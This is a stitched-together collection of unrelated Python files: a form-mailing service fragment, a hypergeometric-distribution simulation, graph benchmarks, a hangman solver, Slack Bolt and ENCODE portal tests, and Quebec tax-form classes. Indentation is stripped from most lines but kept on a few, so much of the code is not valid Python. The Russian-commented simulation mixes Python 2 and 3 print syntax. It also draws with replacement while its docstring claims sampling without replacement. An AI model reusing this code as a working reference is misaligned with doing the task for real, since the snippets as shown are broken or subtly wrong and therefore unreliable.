form_payload["result"]["email"]["attachments"] = filled_form
# Get rid of the from field
send_params = dict(form_payload["result"]["email"].copy_flat())
send_params.pop("from", None)
await yag.send(**send_params)
appendix_msg = \
f'Mail sent to {form_payload["result"]["email"]["to"]}'
logger.info("Form %s processed for data: {%s}. %s",
form_payload["template"],
"; ".join([f"{k}: {v}" for k, v in
form_payload["form_data"].items()]),
appendix_msg
)
if form_payload["result"]["download"]:
return filled_form
else:
return None
def _update_template(self, template_id, template_data, var_id):
try:
template = self._templates[template_id]
except KeyError:
raise ByroApiError(f"Unknown template: {template_id}")
# Get template path
template_path = template.get_template_file_path(var_id)
# Save the template
        try:
            with template_path.open("wb") as template_file:
                template_file.write(template_data)
        except Exception as e:
            raise ByroApiError(
                f"Could not save template to {template_path}") from e
logger.info("Template %s updated for %s to file %s", template_id,
var_id, template_path)
def start(self):
# REST
self._http_task = self._loop.create_task(self._http_handler.run(
host=self._config['rest_api']['addr'],
port=self._config['rest_api']['port']
))
def stop(self):
# REST
self._http_handler.shutdown()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Две модели гипергеометрическое распределение (N=2 и N=40)
Запуск:
python ./hypergeometric_distribution.py
Пример визуализации возникновения событий в соответствии с гипергеометрическим распределением.
Гипергеометрическое распределение моделирует количество удачных выборок без возвращения из конечной совокупности.
Его параметры:
- T (в модели константа T) - совокупность объектов
- D - количество объектов с заданным свойством в совокупности T
- n - количество объектов в выборке
- k - количество объектов с заданным свойством в выборке n
См. https://ru.wikipedia.org/wiki/%D0%93%D0%B8%D0%BF%D0%B5%D1%80%D0%B3%D0%B5%D0%BE%D0%BC%D0%B5%D1%82%D1%80%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B5_%D1%80%D0%B0%D1%81%D0%BF%D1%80%D0%B5%D0%B4%D0%B5%D0%BB%D0%B5%D0%BD%D0%B8%D0%B5
ЦИТАТА:
"Классическим применением гипергеометрического распределения является выборка без возвращения.
Рассмотрим урну с двумя типами шаров: черными и белыми.
Определим вытягивание белого шара как успех, а черного как неудачу.
Если N является числом всех шаров в урне и D является числом белых шаров,
то N − D является числом черных шаров.
Теперь предположим, что в урне находятся WHITE = 5 белых и BLACK = 45 черных шаров.
Стоя рядом с урной, вы закрываете глаза и вытаскиваете 10 шаров."
Модель показывает количество вытянутых белых шаров.
Белые шары моделируются числом 1.
Чёрные шары моделируются числом 0.
Формируется 5 одинаковых моделей с 5 таблицами, собирающими факты возникновения событий.
После моделирования выполняется построение графиков возникновения событий.
"""
# pylint: disable=line-too-long,missing-docstring,bad-whitespace
import sys
import os
import random
import math
DIRNAME_MODULE = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(sys.argv[0]))))) + os.sep
sys.path.append(DIRNAME_MODULE)
sys.path.append(DIRNAME_MODULE + "pyss" + os.sep)
from pyss import pyssobject
from pyss.pyss_model import PyssModel
from pyss.segment import Segment
from pyss import generate
from pyss.generate import Generate
from pyss.terminate import Terminate
from pyss import logger
from pyss.table import Table
from pyss.assemble import Assemble
from pyss.qtable import Qtable
from pyss.handle import Handle
from pyss.enter import Enter
from pyss.leave import Leave
from pyss.storage import Storage
from pyss.advance import Advance
from pyss.assign import Assign
from pyss.preempt import Preempt
from pyss.g_return import GReturn
from pyss.facility import Facility
from pyss.seize import Seize
from pyss.release import Release
from pyss.transfer import Transfer
from pyss.tabulate import Tabulate
from pyss.test import Test
from pyss.queue import Queue
from pyss.depart import Depart
from pyss.split import Split
from pyss.bprint import Bprint
from pyss.gate import Gate
from pyss.pyss_const import *
from pyss.func_discrete import FuncDiscrete
from pyss.func_exponential import Exponential
from pyss.func_normal import Normal
from pyss.plot_func import PlotFunc
from pyss.simpleobject import SimpleObject
def main():
logger.info("--- Гипергеометрические распределение ---")
random.seed()
#
N=10
WHITE = 5
BLACK = 45
    # the population
T=[0]*BLACK
T.extend([1]*WHITE)
    print(T)
def valFunc_T_1(owner, transact):
l=[random.choice(T) for x in range(N)]
print "Выбрано: %s"%str(l)
return sum(l)
CAPTION="hypergeometricDistribution"
### MODEL ----------------------------------
m = PyssModel()
sgm = Segment(m)
#
m[OPTIONS].setAllFalse()
m[OPTIONS].printResult = True
#
MAX_TIME=24*4
# tables
F_1="F_1"
def argFunc_T_1(owner, transact):
return transact[TIME_CREATED]
tables = Table(m,
tableName="T_1",
argFunc=argFunc_T_1,
limitUpFirst=1,
widthInt=1,
countInt=MAX_TIME).setDisplaying(displaying=False)
#
def mf(owner, currentTime):
        # coin toss
return 1
    # generation interval is produced by mf()
    Generate(sgm, med_value=0, modificatorFunc=mf, first_tx=0, max_amount=1000)
Tabulate(sgm, table=m.getTables()[0],valFunc=valFunc_T_1)
Terminate(sgm, deltaTerminate=0)
#
m.initPlotTable(title=CAPTION)
#
m.start(terminationCount=MAX_TIME, maxTime=MAX_TIME)
#
m.plotByModulesAndSave(CAPTION)
m.plotByModulesAndShow()
if __name__ == '__main__':
main()
|
from timeit import timeit
from source import adjacency_graph, edges_graph, records_graph
def timer(repeats=1):
def decorator(f):
def new_function():
full_time = timeit(f, number=repeats)
return round(full_time, 3)
return new_function
return decorator
class EGraph:
@staticmethod
@timer(repeats=10 ** 6)
def vertex_neighbors():
edges_graph.vertex_neighbors('P3')
@staticmethod
@timer(repeats=10 ** 6)
def edges_number():
edges_graph.edges_number()
@staticmethod
@timer(repeats=10 ** 6)
def is_chain():
edges_graph.is_chain(['E2', 'N2', 'P3', 'P1', 'N1', 'A2'])
@staticmethod
@timer(repeats=10 ** 6)
def vertex_by_weights_sum():
edges_graph.vertex_by_weights_sum(weight=36)
class RGraph:
@staticmethod
@timer(repeats=10 ** 6)
def vertex_neighbors():
records_graph.vertex_neighbors('P3')
@staticmethod
@timer(repeats=10 ** 6)
def edges_number():
records_graph.edges_number()
@staticmethod
@timer(repeats=10 ** 6)
def is_chain():
records_graph.is_chain(['E2', 'N2', 'P3', 'P1', 'N1', 'A2'])
@staticmethod
@timer(repeats=10 ** 6)
def vertex_by_weights_sum():
records_graph.vertex_by_weights_sum(weight=36)
class AGraph:
@staticmethod
@timer(repeats=10 ** 6)
def vertex_neighbors():
adjacency_graph.vertex_neighbors('P3')
@staticmethod
@timer(repeats=10 ** 6)
def edges_number():
adjacency_graph.edges_number()
@staticmethod
@timer(repeats=10 ** 6)
def is_chain():
adjacency_graph.is_chain(['E2', 'N2', 'P3', 'P1', 'N1', 'A2'])
@staticmethod
@timer(repeats=10 ** 6)
def vertex_by_weights_sum():
adjacency_graph.vertex_by_weights_sum(weight=36)
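# Example: run one benchmark from each representation and print the measured
# time in seconds (each call runs the wrapped operation 10**6 times via timeit).
if __name__ == '__main__':
    for graph in (EGraph, RGraph, AGraph):
        print(graph.__name__, graph.vertex_neighbors())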
|
# Simple hangman solver, guesses letters in order of frequency
import re
print('anttispitkanen')
words = []
temp_words = []
word = input().strip()
while word:
words.append(word)
temp_words.append(word)
word = input().strip()
letters = {letter for word in words for letter in word}
frequencies = [(letter, sum(word.count(letter) for word in words)) for letter in letters]
guess_order = sorted(frequencies, key=lambda a: a[1], reverse=True)
def remove_words_of_wrong_length(corr_length):
remaining_words = []
for word in words:
if len(word) == corr_length:
remaining_words.append(word)
return remaining_words
def recount_guess_order(new_set_of_words):
letters = {letter for word in new_set_of_words for letter in word}
frequencies = [(letter, sum(word.count(letter) for word in new_set_of_words)) for letter in letters]
guess_order = sorted(frequencies, key=lambda a: a[1], reverse=True)
return guess_order
def find_most_common_letter(guess_order, forbidden_letters):
    i = 0
    while True:
        if guess_order[i][0] not in forbidden_letters:
            return guess_order[i][0]
        i += 1
def filter_words_with_wrong_letter(letter, words):
new_words = []
for word in words:
if letter not in word:
new_words.append(word)
return new_words
def match_regex(reg_string, words):
new_words = []
for word in words:
if re.match(reg_string, word):
new_words.append(word)
return new_words
def remove_guessed_words(temp_words, guessed_words):
new_words = []
for word in temp_words:
if word not in guessed_words:
new_words.append(word)
return new_words
# GAMEPLAY #####################################################################
try:
status = input()
word_length = len(status)
while status:
temp_words = remove_words_of_wrong_length(word_length)
guess_order = recount_guess_order(temp_words)
used_letters = []
guessed_words = [] #for full words that are guessed already
while True:
most_common_letter = find_most_common_letter(guess_order, used_letters)
#remove possibly guessed full words
temp_words = remove_guessed_words(temp_words, guessed_words)
            #if only a few candidate words remain, guess whole words directly
if len(temp_words) < 5:
print(temp_words[0])
guessed_words.append(temp_words[0]) #add to guessed_words
result = input()
status = input()
else:
print(most_common_letter)
used_letters.append(most_common_letter)
result = input()
status = input()
            #note: reading result then status in both branches is intentional
if result.startswith('HIT'):
#update based on a correct letter
temp_words = match_regex(status, temp_words)
guess_order = recount_guess_order(temp_words)
else:
#update based on a wrong letter
temp_words = filter_words_with_wrong_letter(most_common_letter, temp_words)
guess_order = recount_guess_order(temp_words)
if status.startswith('WIN') or status.startswith('LOSE') or not status:
used_letters = []
status = input()
word_length = len(status)
break
except EOFError:
pass
|
num = float(input('Enter a real number: '))
print(f'The square of {num} is {num ** 2}')
|
class Solution:
def lengthOfLongestSubstring(self, s: str) -> int:
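        # Sliding window kept as a list: on a repeated character, record the
        # current window length, then drop everything up to and including the
        # previous occurrence of s[i].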
arr = []
res = 0
for i in range(len(s)):
if s[i] in arr:
res = max(res, len(arr))
arr.append(s[i])
ind = arr.index(s[i])
arr = arr[ind+1:]
else:
arr.append(s[i])
res = max(res, len(arr))
return res
s = "abcabcbb"
s = "bbbbb"
s = "pwwkew"
s = ""
s = "aab"
sol = Solution()
print(sol.lengthOfLongestSubstring(s))
|
import math
class Edge:
def __init__(self, lower, upper):
assert upper >= lower
self.lower = lower
self.upper = upper
@property
def width(self):
return (self.upper - self.lower)
@property
def log_ratio(self):
if self.lower <= 0:
return 1
return math.log(self.upper/self.lower)
def get_overlap(edge1, edge2):
IS_LOWER, IS_UPPER = True, False
points = sorted([(edge1.lower, IS_LOWER), (edge1.upper, IS_UPPER),
(edge2.lower, IS_LOWER), (edge2.upper, IS_UPPER)], key=lambda x: x[0])
# the second item must be a lower point and the third item must be an upper point
# for overlap
overlap = points[1][1] == IS_LOWER and points[2][1] == IS_UPPER
overlap_edge = Edge(lower=points[1][0], upper=points[2][0])
return overlap, overlap_edge
def _get_edges_from_bounds(bounds):
return [Edge(bound, bounds[i+1])
for i, bound in enumerate(bounds[:-1])]
def _convert_imp(input_bounds, input_values, output_bounds, cfunc):
"""
Returns the output_values depending on the cfunc.
output_bounds is a list of energies, units are irrelevant,
as long as it matches the units of the input_bounds.
Asserts both input and output bounds are of length greater than 1
Assumes that input and output bounds are in ascending energy. If not
then it will go unchecked and will produce odd results
"""
assert len(output_bounds) > 1
assert len(input_bounds) > 1
input_edges = _get_edges_from_bounds(input_bounds)
output_edges = _get_edges_from_bounds(output_bounds)
def compute_overlap(oedge, last_overlap_index=0):
output_value = 0.0
prev_has_overlap = False
for i, iedge in enumerate(input_edges):
has_overlap, overlap_edge = get_overlap(iedge, oedge)
if has_overlap:
last_overlap_index = i
output_value += cfunc(iedge,
input_values[i],
overlap_edge)
if not has_overlap and prev_has_overlap:
break
prev_has_overlap = has_overlap
return output_value, last_overlap_index
last_index = 0
output_values = []
for edge in output_edges:
output_value, last_index = compute_overlap(
edge, last_overlap_index=last_index)
output_values.append(output_value)
return output_values
def by_energy(input_bounds, input_values, output_bounds):
def cfunc(input_edge, input_value, overlapping_edge):
return overlapping_edge.width*input_value/input_edge.width
return _convert_imp(input_bounds, input_values, output_bounds, cfunc)
def by_lethargy(input_bounds, input_values, output_bounds):
def cfunc(input_edge, input_value, overlapping_edge):
return overlapping_edge.log_ratio*input_value/input_edge.log_ratio
return _convert_imp(input_bounds, input_values, output_bounds, cfunc)
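# A minimal usage sketch (values assumed): rebin a 2-bin spectrum onto 4 bins,
# sharing each input value proportionally to the overlapping bin width.
if __name__ == '__main__':
    print(by_energy([0.0, 1.0, 2.0], [4.0, 8.0], [0.0, 0.5, 1.0, 1.5, 2.0]))
    # -> [2.0, 2.0, 4.0, 4.0]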
|
import sys
from setuptools import setup, find_packages
install_requires=[
'Pillow>=2.2.2',
'Jinja2>=2.7,<2.8',
]
tests_require=[
'cssutils>=0.9,<1.0',
]
# as of Python >= 2.7 argparse module is maintained within Python.
if sys.version_info < (2, 7):
install_requires.append('argparse>=1.1')
# as of Python >= 3.3 unittest.mock module is maintained within Python.
if sys.version_info < (3, 3):
tests_require.append('mock>=1.0')
setup(
name='glue',
version='0.9.4',
url='http://github.com/jorgebastida/glue',
license='BSD',
author='Jorge Bastida',
author_email='me@jorgebastida.com',
description='Glue is a simple command line tool to generate sprites.',
long_description=('Glue is a simple command line tool to generate '
'sprites using any kind of source images like '
'PNG, JPEG or GIF. Glue will generate a unique PNG '
'file containing every source image and a map file '
'including the necessary information to use it.'),
keywords = "glue sprites css cocos2d",
packages = find_packages(),
platforms='any',
install_requires=install_requires,
tests_require=tests_require,
test_suite='tests',
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Utilities'
],
entry_points = {
'console_scripts': [
'glue = glue.bin:main',
]
},
zip_safe = False
)
|
import asyncio
from ssl import SSLContext
import pytest
from slack_sdk import WebClient
from slack_sdk.oauth.installation_store import FileInstallationStore
from slack_sdk.oauth.state_store import FileOAuthStateStore
from slack_sdk.web.async_client import AsyncWebClient
from slack_bolt.async_app import AsyncApp
from slack_bolt.authorization import AuthorizeResult
from slack_bolt.context.async_context import AsyncBoltContext
from slack_bolt.error import BoltError
from slack_bolt.oauth.async_oauth_flow import AsyncOAuthFlow
from slack_bolt.oauth.async_oauth_settings import AsyncOAuthSettings
from slack_bolt.request.async_request import AsyncBoltRequest
from tests.mock_web_api_server import (
setup_mock_web_api_server,
cleanup_mock_web_api_server,
)
from tests.utils import remove_os_env_temporarily, restore_os_env
class TestAsyncApp:
signing_secret = "secret"
valid_token = "xoxb-valid"
mock_api_server_base_url = "http://localhost:8888"
@pytest.fixture
def event_loop(self):
old_os_env = remove_os_env_temporarily()
try:
setup_mock_web_api_server(self)
loop = asyncio.get_event_loop()
yield loop
loop.close()
cleanup_mock_web_api_server(self)
finally:
restore_os_env(old_os_env)
def setup_method(self):
self.old_os_env = remove_os_env_temporarily()
def teardown_method(self):
restore_os_env(self.old_os_env)
def non_coro_func(self, ack):
ack()
def test_non_coroutine_func_listener(self):
app = AsyncApp(signing_secret="valid", token="xoxb-xxx")
with pytest.raises(BoltError):
app.action("a")(self.non_coro_func)
async def simple_listener(self, ack):
await ack()
def test_listener_registration_error(self):
app = AsyncApp(signing_secret="valid", token="xoxb-xxx")
with pytest.raises(BoltError):
app.action({"type": "invalid_type", "action_id": "a"})(self.simple_listener)
# NOTE: We intentionally don't have this test in scenario_tests
# to avoid having async dependencies in the tests.
def test_invalid_client_type(self):
with pytest.raises(BoltError):
AsyncApp(signing_secret="valid", client=WebClient(token="xoxb-xxx"))
# --------------------------
# single team auth
# --------------------------
def test_valid_single_auth(self):
app = AsyncApp(signing_secret="valid", token="xoxb-xxx")
        assert app is not None
def test_token_absence(self):
with pytest.raises(BoltError):
AsyncApp(signing_secret="valid", token=None)
with pytest.raises(BoltError):
AsyncApp(signing_secret="valid", token="")
# --------------------------
# multi teams auth
# --------------------------
def test_valid_multi_auth(self):
app = AsyncApp(
signing_secret="valid",
oauth_settings=AsyncOAuthSettings(
client_id="111.222", client_secret="valid"
),
)
        assert app is not None
def test_valid_multi_auth_oauth_flow(self):
oauth_flow = AsyncOAuthFlow(
settings=AsyncOAuthSettings(
client_id="111.222",
client_secret="valid",
installation_store=FileInstallationStore(),
state_store=FileOAuthStateStore(expiration_seconds=120),
)
)
app = AsyncApp(signing_secret="valid", oauth_flow=oauth_flow)
        assert app is not None
def test_valid_multi_auth_client_id_absence(self):
with pytest.raises(BoltError):
AsyncApp(
signing_secret="valid",
oauth_settings=AsyncOAuthSettings(
client_id=None, client_secret="valid"
),
)
def test_valid_multi_auth_secret_absence(self):
with pytest.raises(BoltError):
AsyncApp(
signing_secret="valid",
oauth_settings=AsyncOAuthSettings(
client_id="111.222", client_secret=None
),
)
def test_authorize_conflicts(self):
oauth_settings = AsyncOAuthSettings(
client_id="111.222",
client_secret="valid",
installation_store=FileInstallationStore(),
state_store=FileOAuthStateStore(expiration_seconds=120),
)
# no error with this
AsyncApp(signing_secret="valid", oauth_settings=oauth_settings)
def authorize() -> AuthorizeResult:
return AuthorizeResult(enterprise_id="E111", team_id="T111")
with pytest.raises(BoltError):
AsyncApp(
signing_secret="valid",
authorize=authorize,
oauth_settings=oauth_settings,
)
oauth_flow = AsyncOAuthFlow(settings=oauth_settings)
# no error with this
AsyncApp(signing_secret="valid", oauth_flow=oauth_flow)
with pytest.raises(BoltError):
AsyncApp(signing_secret="valid", authorize=authorize, oauth_flow=oauth_flow)
def test_installation_store_conflicts(self):
store1 = FileInstallationStore()
store2 = FileInstallationStore()
app = AsyncApp(
signing_secret="valid",
oauth_settings=AsyncOAuthSettings(
client_id="111.222",
client_secret="valid",
installation_store=store1,
),
installation_store=store2,
)
assert app.installation_store is store1
app = AsyncApp(
signing_secret="valid",
oauth_flow=AsyncOAuthFlow(
settings=AsyncOAuthSettings(
client_id="111.222",
client_secret="valid",
installation_store=store1,
)
),
installation_store=store2,
)
assert app.installation_store is store1
app = AsyncApp(
signing_secret="valid",
oauth_flow=AsyncOAuthFlow(
settings=AsyncOAuthSettings(
client_id="111.222",
client_secret="valid",
)
),
installation_store=store1,
)
assert app.installation_store is store1
@pytest.mark.asyncio
async def test_proxy_ssl_for_respond(self):
ssl = SSLContext()
web_client = AsyncWebClient(
token=self.valid_token,
base_url=self.mock_api_server_base_url,
proxy="http://proxy-host:9000/",
ssl=ssl,
)
async def my_authorize():
return AuthorizeResult(
enterprise_id="E111",
team_id="T111",
)
app = AsyncApp(
signing_secret="valid",
client=web_client,
authorize=my_authorize,
)
event_body = {
"token": "verification_token",
"team_id": "T111",
"enterprise_id": "E111",
"api_app_id": "A111",
"event": {
"client_msg_id": "9cbd4c5b-7ddf-4ede-b479-ad21fca66d63",
"type": "app_mention",
"text": "<@W111> Hi there!",
"user": "W222",
"ts": "1595926230.009600",
"team": "T111",
"channel": "C111",
"event_ts": "1595926230.009600",
},
"type": "event_callback",
"event_id": "Ev111",
"event_time": 1595926230,
}
result = {"called": False}
@app.event("app_mention")
async def handle(context: AsyncBoltContext, respond):
assert context.respond.proxy == "http://proxy-host:9000/"
assert context.respond.ssl == ssl
assert respond.proxy == "http://proxy-host:9000/"
assert respond.ssl == ssl
result["called"] = True
req = AsyncBoltRequest(body=event_body, headers={}, mode="socket_mode")
response = await app.async_dispatch(req)
assert response.status == 200
await asyncio.sleep(0.5) # wait a bit after auto ack()
assert result["called"] is True
|
dt.filename = '//femto/C/All Projects/APS/Experiments/2018.06/Archive/PATHOS.dt.txt'
flag.filename = '//mx340hs/data/anfinrud_1805/Archive/PATHOS.flag.txt'
|
import pytest
def test_rnaseq_remote_portal_init():
from genomic_data_service.rnaseq.remote.portal import Portal
portal = Portal()
assert isinstance(portal, Portal)
def test_rnaseq_remote_portal_get_gene_url():
from genomic_data_service.rnaseq.remote.portal import Portal
portal = Portal()
assert portal._get_gene_url() == (
'https://www.encodeproject.org/search/'
'?type=Gene&advancedQuery=dbxrefs:ENSEMBL*'
'&organism.scientific_name=Homo+sapiens'
'&organism.scientific_name=Mus+musculus'
'&field=@id&field=dbxrefs&field=geneid'
'&field=name&field=organism.scientific_name'
'&field=symbol&field=synonyms&field=title'
'&format=json&limit=all'
)
def test_rnaseq_remote_portal_get_dataset_url():
from genomic_data_service.rnaseq.remote.portal import Portal
portal = Portal()
assert portal._get_dataset_url() == (
'https://www.encodeproject.org/search/'
'?type=Experiment&status=released&assay_title=polyA+plus+RNA-seq'
'&assay_title=total+RNA-seq&assay_title=polyA+minus+RNA-seq'
'&replicates.library.biosample.donor.organism.scientific_name=Homo+sapiens'
'&replicates.library.biosample.donor.organism.scientific_name=Mus+musculus'
'&assembly=GRCh38&assembly=mm10&files.file_type=tsv'
'&field=biosample_summary'
'&field=replicates.library.biosample.sex'
'&field=replicates.library.biosample.age'
'&field=replicates.library.biosample.age_units'
'&field=replicates.library.biosample.donor.organism.scientific_name'
'&format=json&limit=all'
)
def test_rnaseq_remote_portal_get_file_url():
from genomic_data_service.rnaseq.remote.portal import Portal
portal = Portal()
assert portal._get_file_url() == (
'https://www.encodeproject.org/search/'
'?type=File&status=released&output_type=gene+quantifications'
'&output_category=quantification&file_format=tsv&assembly=GRCh38&assembly=mm10'
'&assay_title=polyA+plus+RNA-seq&assay_title=total+RNA-seq&assay_title=polyA+minus+RNA-seq'
'&lab.title=ENCODE+Processing+Pipeline'
'&genome_annotation=V29'
'&genome_annotation=M21'
'&preferred_default=true'
'&field=assay_title&field=assembly'
'&field=biosample_ontology.organ_slims&field=biosample_ontology.term_name'
'&field=biosample_ontology.synonyms&field=biosample_ontology.name&field=biosample_ontology.term_id'
'&field=biosample_ontology.classification&field=dataset'
'&field=donors&field=file_type&field=genome_annotation&field=href'
'&field=md5sum&field=output_type&field=s3_uri&field=title'
'&format=json&limit=all'
)
def test_rnaseq_remote_portal_load_genes(mocker, raw_human_genes):
from genomic_data_service.rnaseq.remote.portal import Portal
mocker.patch(
'genomic_data_service.rnaseq.remote.portal.get_json',
return_value={
'@graph': raw_human_genes
}
)
portal = Portal()
portal.load_genes()
assert 'genes' in portal.repositories
assert len(portal.repositories['genes']) == 5
expected_gene_ids = [
'ENSG00000224939',
'ENSG00000283857',
'ENSG00000260442',
'ENSG00000221650',
'ENSG00000034677',
]
for expected_gene_id in expected_gene_ids:
assert expected_gene_id in portal.repositories['genes']
def test_rnaseq_remote_portal_load_datasets(mocker, raw_datasets):
from genomic_data_service.rnaseq.remote.portal import Portal
mocker.patch(
'genomic_data_service.rnaseq.remote.portal.get_json',
return_value={
'@graph': raw_datasets
}
)
portal = Portal()
portal.load_datasets()
assert 'datasets' in portal.repositories
assert len(portal.repositories['datasets']) == 3
expected_dataset_ids = [
'/experiments/ENCSR113HQM/',
'/experiments/ENCSR906HEV/',
'/experiments/ENCSR938LSP/',
]
for expected_dataset_id in expected_dataset_ids:
assert expected_dataset_id in portal.repositories['datasets']
def test_rnaseq_remote_portal_get_rna_seq_files(mock_portal):
files = list(mock_portal.get_rna_seq_files())
assert len(files) == 4
|
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
from __future__ import absolute_import
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.schema import Column, ForeignKey
from sqlalchemy.types import Integer, String, Float
# ============= enthought library imports =======================
# ============= standard library imports ========================
# ============= local library imports ==========================
Base = declarative_base()
def foreignkey(name):
return Column(Integer, ForeignKey('{}.id'.format(name)))
def stringcolumn(size=40, *args, **kw):
return Column(String(size), *args, **kw)
def doublecolumn(**kw):
if 'default' not in kw:
kw['default'] = 0
return Column(Float(32), **kw)
# ============= EOF =============================================
|
# From this directory, execute
# magnetovis --script=Axis.py
import paraview.simple as pvs
import magnetovis as mvs
sourceArguments = {
"time": "2001-01-01",
"extent": [-40., 40.],
"coord_sys": "GSM",
"direction": "X"
}
displayArguments = {
"showSource": True,
"renderView": None,
"displayRepresentation": "Surface",
"opacity": None,
"ambientColor": None,
'diffuseColor': None
}
Axis = mvs.Axis(
registrationName="Z-Axis",
sourceArguments=sourceArguments,
renderSource=True,
displayArguments=displayArguments # Ignored if renderSource=False
)
displayArguments['showSource'] = True
displayArguments['ambientColor'] = [1, 0, 0]
displayArguments['diffuseColor'] = [1, 0, 0]
Axis.SetDisplayOptions(displayArguments)
# reset view to fit data
Axis.renderView.ResetCamera()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
from slack_logging.formatters import LevelEmojis, SlackLoggerFormatter
from slack_logging.handlers import SlackLoggerHandler
def configure_slack_logger(logger_name):
"""
build a logger with handlers for the configured channels
:type logger_name: str|unicode
:rtype: logging.Logger
"""
logger = logging.getLogger(logger_name)
handler = SlackLoggerHandler()
handler.setFormatter(SlackLoggerFormatter())
logger.addHandler(handler)
return logger
def set_slack_message_format(fmt):
"""Sets the message format for the formatters"""
SlackLoggerFormatter.BASE_FORMAT = fmt
def set_level_emoji(log_level, emoji):
"""
    Set the emoji used in slack messages for a given log level
    :param str log_level: a log level name, e.g. ERROR
    :param str emoji: a slack emoji string e.g. :joy:
"""
if hasattr(LevelEmojis, log_level):
setattr(LevelEmojis, log_level, emoji)
else:
raise ValueError('Unsupported log level {}'.format(log_level))
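# Minimal usage sketch (assumes slack channels/webhooks are already configured
# for SlackLoggerHandler, and that LevelEmojis defines an ERROR attribute):
#     logger = configure_slack_logger('my_app')
#     set_level_emoji('ERROR', ':fire:')
#     logger.error('Something went wrong')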
|
import os
from srd import add_params_as_attr, add_schedule_as_attr
from srd.quebec import template
module_dir = os.path.dirname(os.path.dirname(__file__))
# wrapper to pick correct year
def form(year):
"""
Fonction qui permet de sélectionner le formulaire d'impôt provincial par année.
Parameters
----------
year: int
année (présentement entre 2016 et 2020)
Returns
-------
class instance
Une instance du formulaire pour l'année sélectionnée.
"""
    if year == 2016:
        p = form_2016()
    elif year == 2017:
        p = form_2017()
    elif year == 2018:
        p = form_2018()
    elif year == 2019:
        p = form_2019()
    elif year == 2020:
        p = form_2020()
    else:
        raise ValueError('year must be between 2016 and 2020')
    return p
class form_2016(template):
"""
    2016 income tax form.
"""
def __init__(self):
add_params_as_attr(self, module_dir + '/quebec/params/measures_2016.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/schedule_2016.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/chcare_2016.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/health_contrib_2016.csv')
class form_2017(form_2016):
"""
    2017 income tax form.
"""
def __init__(self):
add_params_as_attr(self, module_dir + '/quebec/params/measures_2017.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/schedule_2017.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/chcare_2017.csv')
def calc_contributions(self, p, hh):
"""
Fonction qui remplace dans le gabarit (classe *srd.quebec.template*) la fonction du même nom, et calcule les contributions.
Cette fonction fait la somme des contributions du contribuable. La contribution santé est abolie en 2017.
Parameters
----------
p: Person
instance de la classe Person
hh: Hhold
instance de la classe Hhold
"""
p.prov_return['contributions'] += self.add_contrib_subsid_chcare(p, hh)
def get_donations_cred(self, p):
"""
Fonction qui remplace dans le gabarit (classe *srd.quebec.template*) la fonction du même nom, et calcule le crédit d'impôt non-remboursable pour dons.
Parameters
----------
p: Person
instance de la classe Person
Returns
-------
float
Montant du crédit
"""
tot_donation = p.donation + p.gift
if tot_donation <= self.nrtc_donation_low_cut:
return tot_donation * self.nrtc_donation_low_rate
else:
extra_donation = tot_donation - self.nrtc_donation_low_cut
high_inc = max(0, p.fed_return['taxable_income']
- self.nrtc_donation_high_cut)
donation_high_inc = min(extra_donation, high_inc)
donation_low_inc = extra_donation - donation_high_inc
return (self.nrtc_donation_low_cut * self.nrtc_donation_low_rate
+ donation_high_inc * self.nrtc_donation_high_rate
+ donation_low_inc * self.nrtc_donation_med_rate)
class form_2018(form_2017):
"""
    2018 income tax form.
"""
def __init__(self):
add_params_as_attr(self, module_dir + '/quebec/params/measures_2018.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/schedule_2018.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/chcare_2018.csv')
def senior_assist(self, p, hh):
"""
Fonction qui remplace dans le gabarit (classe *srd.quebec.template*) la fonction du même nom, et calcule le crédit remboursable pour support aux ainés. En vigueur à partir de 2018.
Parameters
----------
p: Person
instance de la classe Person
hh: Hhold
instance de la classe Hhold
Returns
-------
float
Montant du crédit
"""
if max([p.age for p in hh.sp]) < self.senior_assist_min_age:
return 0
n_elderly = len([p.age for p in hh.sp
if p.age >= self.senior_assist_min_age])
amount = self.senior_assist_amount * n_elderly
if hh.couple:
cutoff = self.senior_assist_cutoff_couple
else:
cutoff = self.senior_assist_cutoff_single
clawback = self.senior_assist_claw_rate * max(0, hh.fam_net_inc_prov - cutoff)
return max(0, amount - clawback) / (1 + hh.couple)
class form_2019(form_2018):
"""
    2019 income tax form.
"""
def __init__(self):
add_params_as_attr(self, module_dir + '/quebec/params/measures_2019.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/schedule_2019.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/chcare_2019.csv')
def calc_contributions(self, p, hh):
"""
Fonction qui remplace la fonction antérieure du même nom, et calcule les contributions.
Cette fonction fait la somme des contributions du contribuable. La contribution additionnelle pour service de garde éducatifs à l'enfance subventionnés est abolie en 2019.
Parameters
----------
p: Person
instance de la classe Person
hh: Hhold
instance de la classe Hhold
"""
pass
class form_2020(form_2019):
"""
    2020 income tax form.
"""
def __init__(self):
add_params_as_attr(self, module_dir + '/quebec/params/measures_2020.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/schedule_2020.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/chcare_2020.csv')
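# Minimal usage sketch (Person/Hhold construction omitted; see the srd package
# for the full API):
#     qc_form = form(2019)   # returns a form_2019 instance
#     # form_2019.calc_contributions is a no-op: the additional subsidized
#     # childcare contribution no longer applies from 2019 onward.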
|
